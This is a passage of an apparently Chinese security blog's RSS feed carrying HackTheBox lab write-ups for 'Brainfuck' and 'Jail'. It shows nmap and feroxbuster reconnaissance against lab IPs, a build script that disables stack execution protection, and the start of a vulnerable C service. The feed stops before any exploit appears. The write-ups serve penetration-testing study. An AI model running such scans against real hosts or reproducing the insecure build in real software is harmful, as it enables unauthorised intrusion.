<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hackbox | Kaia</title><link>https://docs.kaiasec.tk/post/hackbox/</link><atom:link href="https://docs.kaiasec.tk/post/hackbox/index.xml" rel="self" type="application/rss+xml"/><description>Hackbox</description><generator>Wowchemy (https://wowchemy.com)</generator><language>zh-Hans</language><lastBuildDate>Fri, 09 Dec 2022 11:45:44 +0800</lastBuildDate><image><url>https://docs.kaiasec.tk/media/logo.svg</url><title>Hackbox</title><link>https://docs.kaiasec.tk/post/hackbox/</link></image><item><title>Brainfuck</title><link>https://docs.kaiasec.tk/post/hackbox/brainfuck/</link><pubDate>Fri, 05 Aug 2022 14:51:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/brainfuck/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -A -p- 10.10.10.17
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Starting Nmap 7.92 &lt;span class="o">(&lt;/span> https://nmap.org &lt;span class="o">)&lt;/span> at 2022-08-05 02:47 EDT
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Nmap scan report &lt;span class="k">for&lt;/span> 10.10.10.17
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host is up &lt;span class="o">(&lt;/span>0.091s latency&lt;span class="o">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Not shown: &lt;span class="m">65530&lt;/span> filtered tcp ports &lt;span class="o">(&lt;/span>no-response&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 &lt;span class="o">(&lt;/span>Ubuntu Linux&lt;span class="p">;&lt;/span> protocol 2.0&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ssh-hostkey:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">2048&lt;/span> 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 &lt;span class="o">(&lt;/span>RSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">256&lt;/span> 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 &lt;span class="o">(&lt;/span>ECDSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ &lt;span class="m">256&lt;/span> 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 &lt;span class="o">(&lt;/span>ED25519&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">25/tcp open smtp Postfix smtpd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">110/tcp open pop3 Dovecot pop3d
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_pop3-capabilities: SASL&lt;span class="o">(&lt;/span>PLAIN&lt;span class="o">)&lt;/span> USER RESP-CODES CAPA TOP PIPELINING UIDL AUTH-RESP-CODE
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">143/tcp open imap Dovecot imapd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_imap-capabilities: IMAP4rev1 IDLE &lt;span class="nv">AUTH&lt;/span>&lt;span class="o">=&lt;/span>PLAINA0001 LITERAL+ ID more Pre-login have post-login capabilities LOGIN-REFERRALS OK listed ENABLE SASL-IR
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">443/tcp open ssl/http nginx 1.10.0 &lt;span class="o">(&lt;/span>Ubuntu&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> tls-alpn:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ http/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ssl-cert: Subject: &lt;span class="nv">commonName&lt;/span>&lt;span class="o">=&lt;/span>brainfuck.htb/organizationName&lt;span class="o">=&lt;/span>Brainfuck Ltd./stateOrProvinceName&lt;span class="o">=&lt;/span>Attica/countryName&lt;span class="o">=&lt;/span>GR
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Not valid before: 2017-04-13T11:19:29
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_Not valid after: 2027-04-11T11:19:29
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_http-title: Welcome to nginx!
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_http-server-header: nginx/1.10.0 &lt;span class="o">(&lt;/span>Ubuntu&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> tls-nextprotoneg:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ http/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ssl-date: TLS randomness does not represent &lt;span class="nb">time&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Warning: OSScan results may be unreliable because we could not find at least &lt;span class="m">1&lt;/span> open and &lt;span class="m">1&lt;/span> closed port
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Aggressive OS guesses: Linux 3.10 - 4.11 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.12 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.13 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.13 or 4.2 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.16 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.16 - 4.6 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.2 - 4.9 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 3.8 - 3.11 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 4.2 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>, Linux 4.4 &lt;span class="o">(&lt;/span>92%&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">No exact OS matches &lt;span class="k">for&lt;/span> host &lt;span class="o">(&lt;/span>&lt;span class="nb">test&lt;/span> conditions non-ideal&lt;span class="o">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Network Distance: &lt;span class="m">2&lt;/span> hops
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Service Info: Host: brainfuck&lt;span class="p">;&lt;/span> OS: Linux&lt;span class="p">;&lt;/span> CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">TRACEROUTE &lt;span class="o">(&lt;/span>using port 443/tcp&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">HOP RTT ADDRESS
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">1&lt;/span> 73.51 ms 10.10.16.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">2&lt;/span> 143.86 ms 10.10.10.17
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Nmap &lt;span class="k">done&lt;/span>: &lt;span class="m">1&lt;/span> IP address &lt;span class="o">(&lt;/span>&lt;span class="m">1&lt;/span> host up&lt;span class="o">)&lt;/span> scanned in 187.77 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Jail</title><link>https://docs.kaiasec.tk/post/hackbox/jail/</link><pubDate>Thu, 04 Aug 2022 21:02:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/jail/</guid><description>&lt;h2 id="目录">目录&lt;/h2>
&lt;ul>
&lt;li>&lt;a href="#nmap%e6%89%ab%e6%8f%8f">nmap扫描&lt;/a>
&lt;ul>
&lt;li>&lt;a href="#%e6%89%ab%e6%8f%8fweb%e8%b7%af%e5%be%84">扫描web路径&lt;/a>&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>&lt;a href="#%e4%bb%a3%e7%a0%81%e5%88%86%e6%9e%90">代码分析：&lt;/a>&lt;/li>
&lt;li>&lt;a href="#%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%85%b3%e9%94%ae%e7%82%b9">漏洞的关键点&lt;/a>
&lt;ul>
&lt;li>&lt;a href="#IDA%e8%b0%83%e8%af%95">IDA调试&lt;/a>&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>&lt;a href="#%e8%8e%b7%e5%8f%96nobody-shell">获取nobody shell&lt;/a>&lt;/li>
&lt;li>&lt;a href="#pkexec%e6%8f%90%e6%9d%83%e4%b8%80%e6%ad%a5%e5%88%b0%e4%bd%8d%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3">pkexec提权一步到位(非预期解)&lt;/a>&lt;/li>
&lt;li>&lt;a href="#%e6%ad%a3%e5%b8%b8%e6%8f%90%e6%9d%83">正常提权&lt;/a>
&lt;ul>
&lt;li>&lt;a href="#nobody%e6%8f%90%e6%9d%83%e5%88%b0frank">nobody提权到frank&lt;/a>&lt;/li>
&lt;li>&lt;a href="#%e4%bc%aa%e9%80%a0frank%e7%94%a8%e6%88%b7-%e8%ae%bf%e9%97%aenfs">伪造frank用户 访问nfs&lt;/a>&lt;/li>
&lt;li>&lt;a href="#frank%e6%8f%90%e6%9d%83%e5%88%b0adm">frank提权到adm&lt;/a>&lt;/li>
&lt;li>&lt;a href="#adm%e6%8f%90%e6%9d%83%e5%88%b0root">adm提权到root&lt;/a>&lt;/li>
&lt;li>&lt;a href="#%e4%b8%8b%e9%9d%a2%e7%9a%84%e6%89%af%e6%b7%a1%e7%9a%84%e7%a4%be%e5%b7%a5%e8%a7%a3%e5%af%86%e6%97%b6%e9%97%b4">下面的扯淡的社工解密时间&lt;/a>&lt;/li>
&lt;li>&lt;a href="#%e6%81%a2%e5%a4%8droot%e5%85%ac%e9%92%a5">恢复root公钥&lt;/a>&lt;/li>
&lt;/ul>
&lt;/li>
&lt;/ul>
&lt;h3 id="nmap扫描">nmap扫描&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -A 10.10.10.34
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Starting Nmap 7.92 &lt;span class="o">(&lt;/span> https://nmap.org &lt;span class="o">)&lt;/span> at 2022-07-28 22:27 EDT
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Stats: 0:02:01 elapsed&lt;span class="p">;&lt;/span> &lt;span class="m">0&lt;/span> hosts completed &lt;span class="o">(&lt;/span>&lt;span class="m">1&lt;/span> up&lt;span class="o">)&lt;/span>, &lt;span class="m">1&lt;/span> undergoing SYN Stealth Scan
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">SYN Stealth Scan Timing: About 48.94% &lt;span class="k">done&lt;/span>&lt;span class="p">;&lt;/span> ETC: 22:32 &lt;span class="o">(&lt;/span>0:02:04 remaining&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Stats: 0:05:59 elapsed&lt;span class="p">;&lt;/span> &lt;span class="m">0&lt;/span> hosts completed &lt;span class="o">(&lt;/span>&lt;span class="m">1&lt;/span> up&lt;span class="o">)&lt;/span>, &lt;span class="m">1&lt;/span> undergoing Service Scan
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Service scan Timing: About 83.33% &lt;span class="k">done&lt;/span>&lt;span class="p">;&lt;/span> ETC: 22:34 &lt;span class="o">(&lt;/span>0:00:16 remaining&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Nmap scan report &lt;span class="k">for&lt;/span> 10.10.10.34
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host is up &lt;span class="o">(&lt;/span>0.12s latency&lt;span class="o">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Not shown: &lt;span class="m">65257&lt;/span> filtered tcp ports &lt;span class="o">(&lt;/span>no-response&lt;span class="o">)&lt;/span>, &lt;span class="m">272&lt;/span> filtered tcp ports &lt;span class="o">(&lt;/span>host-prohibited&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">22/tcp open ssh OpenSSH 6.6.1 &lt;span class="o">(&lt;/span>protocol 2.0&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ssh-hostkey:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">2048&lt;/span> cd:ec:19:7c:da:dc:16:e2:a3:9d:42:f3:18:4b:e6:4d &lt;span class="o">(&lt;/span>RSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">256&lt;/span> af:94:9f:2f:21:d0:e0:1d:ae:8e:7f:1d:7b:d7:42:ef &lt;span class="o">(&lt;/span>ECDSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ &lt;span class="m">256&lt;/span> 6b:f8:dc:27:4f:1c:89:67:a4:67:c5:ed:07:53:af:97 &lt;span class="o">(&lt;/span>ED25519&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">80/tcp open http Apache httpd 2.4.6 &lt;span class="o">((&lt;/span>CentOS&lt;span class="o">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> http-methods:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ Potentially risky methods: TRACE
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_http-title: Site doesn&lt;span class="err">&amp;#39;&lt;/span>t have a title &lt;span class="o">(&lt;/span>text/html&lt;span class="p">;&lt;/span> &lt;span class="nv">charset&lt;/span>&lt;span class="o">=&lt;/span>UTF-8&lt;span class="o">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_http-server-header: Apache/2.4.6 &lt;span class="o">(&lt;/span>CentOS&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">111/tcp open rpcbind 2-4 &lt;span class="o">(&lt;/span>RPC &lt;span class="c1">#100000)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> rpcinfo:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> program version port/proto service
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100000&lt;/span> 2,3,4 111/tcp rpcbind
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100000&lt;/span> 2,3,4 111/udp rpcbind
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100000&lt;/span> 3,4 111/tcp6 rpcbind
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100000&lt;/span> 3,4 111/udp6 rpcbind
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100003&lt;/span> 3,4 2049/tcp nfs
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100003&lt;/span> 3,4 2049/tcp6 nfs
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100003&lt;/span> 3,4 2049/udp nfs
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100003&lt;/span> 3,4 2049/udp6 nfs
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100005&lt;/span> 1,2,3 20048/tcp mountd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100005&lt;/span> 1,2,3 20048/tcp6 mountd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100005&lt;/span> 1,2,3 20048/udp mountd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100005&lt;/span> 1,2,3 20048/udp6 mountd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100021&lt;/span> 1,3,4 39526/tcp6 nlockmgr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100021&lt;/span> 1,3,4 42846/udp6 nlockmgr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100021&lt;/span> 1,3,4 46781/tcp nlockmgr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100021&lt;/span> 1,3,4 49806/udp nlockmgr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100024&lt;/span> &lt;span class="m">1&lt;/span> 33052/udp status
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100024&lt;/span> &lt;span class="m">1&lt;/span> 34561/tcp status
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100024&lt;/span> &lt;span class="m">1&lt;/span> 49568/tcp6 status
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100024&lt;/span> &lt;span class="m">1&lt;/span> 56922/udp6 status
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100227&lt;/span> &lt;span class="m">3&lt;/span> 2049/tcp nfs_acl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100227&lt;/span> &lt;span class="m">3&lt;/span> 2049/tcp6 nfs_acl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">100227&lt;/span> &lt;span class="m">3&lt;/span> 2049/udp nfs_acl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ &lt;span class="m">100227&lt;/span> &lt;span class="m">3&lt;/span> 2049/udp6 nfs_acl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">2049/tcp open nfs_acl &lt;span class="m">3&lt;/span> &lt;span class="o">(&lt;/span>RPC &lt;span class="c1">#100227)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">7411/tcp open daqstream?
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> fingerprint-strings:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ OK Ready. Send USER command.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">20048/tcp open mountd 1-3 &lt;span class="o">(&lt;/span>RPC &lt;span class="c1">#100005)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现以下端口信息：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">22端口 ssh OpenSSH 6.6.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">80端口 http Apache httpd 2.4.6 &lt;span class="o">((&lt;/span>CentOS&lt;span class="o">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">111端口 rpcbind
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">2049&lt;/span> nfs_acl
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">7411&lt;/span> 未知服务
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="m">20048&lt;/span> mountd nfs挂载守护进程
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>访问80端口，返回一个有意思的图片，没什么信息。&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_trgbGDYZgV_hu1a8757a74f402c4ce3ae47378a451600_112106_acccf891945a0dbcb71599b10c66a6d8.webp 400w,
/post/hackbox/jail/image/image_trgbGDYZgV_hu1a8757a74f402c4ce3ae47378a451600_112106_ef859b0adbbaf7bcf88a18b9c6062bca.webp 760w,
/post/hackbox/jail/image/image_trgbGDYZgV_hu1a8757a74f402c4ce3ae47378a451600_112106_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_trgbGDYZgV_hu1a8757a74f402c4ce3ae47378a451600_112106_acccf891945a0dbcb71599b10c66a6d8.webp"
width="1573"
height="813"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="扫描web路径">扫描web路径&lt;/h4>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">feroxbuster -u http://10.10.10.34 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_zv7SM80GyK_hu530dabea51bb70c19aba842666071ff8_62963_b7c88326ccd8afa46cd64d099036ebcb.webp 400w,
/post/hackbox/jail/image/image_zv7SM80GyK_hu530dabea51bb70c19aba842666071ff8_62963_68df9907265288f40089fcbf24e086a5.webp 760w,
/post/hackbox/jail/image/image_zv7SM80GyK_hu530dabea51bb70c19aba842666071ff8_62963_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_zv7SM80GyK_hu530dabea51bb70c19aba842666071ff8_62963_b7c88326ccd8afa46cd64d099036ebcb.webp"
width="1115"
height="492"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现目录 &lt;a href="http://10.10.10.34/jailuser%ef%bc%8c" target="_blank" rel="noopener">http://10.10.10.34/jailuser，&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_YyG0T2eqQ0_hu21b5c3c2f6fbef8d0d015995b5037267_46742_75f6fa2b0c8b45a8ce44ba0e1382d172.webp 400w,
/post/hackbox/jail/image/image_YyG0T2eqQ0_hu21b5c3c2f6fbef8d0d015995b5037267_46742_9be627279c72910995e3c0e5da1a5844.webp 760w,
/post/hackbox/jail/image/image_YyG0T2eqQ0_hu21b5c3c2f6fbef8d0d015995b5037267_46742_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_YyG0T2eqQ0_hu21b5c3c2f6fbef8d0d015995b5037267_46742_75f6fa2b0c8b45a8ce44ba0e1382d172.webp"
width="601"
height="329"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>compile.sh&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">gcc -o jail jail.c -m32 -z execstack
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">service jail stop
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">cp jail /usr/local/bin/jail
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">service jail start
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>但是&lt;code>-z execstack&lt;/code> 禁用了数据区执行保护 (DEP)，也就是说如果jail.c的逻辑存在溢出问题，可以执行恶意指令。&lt;/p>
&lt;p>那目标明确，接下来重点分析jail的源代码&lt;/p>
&lt;p>jail.c&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;stdio.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;stdlib.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;netdb.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;netinet/in.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;string.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;unistd.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;time.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int debugmode&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int handle&lt;span class="o">(&lt;/span>int sock&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int auth&lt;span class="o">(&lt;/span>char *username, char *password&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
